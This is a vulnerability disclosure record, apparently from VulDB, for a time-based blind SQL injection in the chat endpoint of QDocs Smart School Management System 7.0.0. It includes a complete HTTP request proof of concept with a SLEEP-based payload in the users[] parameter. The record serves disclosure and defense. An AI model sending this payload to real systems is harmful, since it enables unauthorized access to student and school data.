| Название | QDocs QDocs Smart School Management System 7.0.0 SQL Injection |
|---|
| Описание |
A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data.
This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system.
Impact:
Execute Arbitrary SQL Commands
Infer Sensitive Information
Compromise Data Integrity
Proof of Concept (PoC):
POST /user/chat/mynewuser HTTP/1.1
Host: [placeholder-host]
Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft
Content-Length: 79
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Linux"
Origin: https://[placeholder-host]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[placeholder-host]/webtest/user/chat
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM
Discovered By: Jobyer Ahmed
|
|---|
| Источник | ⚠️ https://github.com/bytium/vulnerability-research/blob/main/Advisory%20for%20Time-Based%20Blind%20SQL%20Injection%20in%20QDocs%20Smart%20School.md |
|---|
| Пользователь | suffer (UID 74855) |
|---|
| Представление | 12.09.2024 23:41 (2 лет назад) |
|---|
| Модерация | 13.09.2024 15:09 (15 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 277435 [QDocs Smart School Management System 7.0.0 Chat /user/chat/mynewuser users[] SQL-инъекция] |
|---|
| Баллы | 20 |
|---|